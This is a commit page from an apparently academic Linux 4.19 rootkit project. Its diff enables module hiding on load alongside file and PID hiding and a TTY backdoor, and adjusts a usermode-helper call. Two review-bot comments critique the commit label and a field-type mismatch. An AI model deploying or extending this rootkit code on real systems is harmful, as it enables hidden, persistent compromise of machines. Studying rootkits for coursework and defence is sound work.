linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 859073e790825a12fc5eab8d48c9a6bc64e4964a
parent 74c031701e4a40b481853236b4324d5b4d691447
Author: deurzen <m.deurzen@tum.de>
Date:   Sat,  5 Dec 2020 18:38:20 +0100

refactors code

Diffstat:
Msrc/channel.c | 4+++-
Msrc/g7.c | 7++++---
2 files changed, 7 insertions(+), 4 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -85,7 +85,9 @@ handle_modhide(unsigned long arg)
 DEBUG_NOTICE("unloading module\n");
- call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
+ call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
+
+ DEBUG_NOTICE("after unload\n");
 } else if (sarg < 0) {
 unhide_module();
 rootkit.hiding_module = 0;
diff --git a/src/g7.c b/src/g7.c
@@ -40,8 +40,9 @@ static struct file_operations g7_fops =
 rootkit_t rootkit = {
- .hiding_files = true,
- .hiding_pids = true,
+ .hiding_module = true,
+ .hiding_files = true,
+ .hiding_pids = true,
 .backdoor = BD_TTY,
 };
@@ -116,7 +117,7 @@ g7_exit(void)
 MODULE_LICENSE("GPL");
 MODULE_AUTHOR("Group 7");
-MODULE_DESCRIPTION("Assignment 3");
+MODULE_DESCRIPTION("Rootkit Programming");
 MODULE_INFO(intree, "Y");
 module_init(g7_init);
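Review bot: The switch from `UMH_WAIT_EXEC` to `UMH_NO_WAIT` in handle_modhide changes behaviour, yet the commit is labelled "refactors code" and nothing in the code records the change. With `UMH_NO_WAIT` the call returns once the helper has been queued, so the return value (discarded here) says nothing about whether the helper ran, and the new `DEBUG_NOTICE("after unload\n")` may be logged before it has. I would add a comment above the call, `/* UMH_NO_WAIT: returns once the helper is queued; its exec and exit status are not observed */`, and reword the log line to say only that the helper was queued. The same mislabelling applies to the g7.c initializer hunk, which changes the load-time defaults. handle_modhide starts and ends outside this hunk, so the contents of argv and envp are not visible here.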
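Review bot: `hiding_module` is spelled as a bool here (`.hiding_module = true,`) but as an int in handle_modhide (`rootkit.hiding_module = 0;` in src/channel.c), so the two files disagree on the field's type. Pick one spelling, e.g. `rootkit.hiding_module = false;` in channel.c, and document the initializer with a comment such as `/* load-time defaults; hiding_module is also written by handle_modhide in channel.c */`. Whether g7_init acts on this flag is outside the hunk, so anyone analysing the module should confirm its initial state from g7_init rather than from this initializer alone.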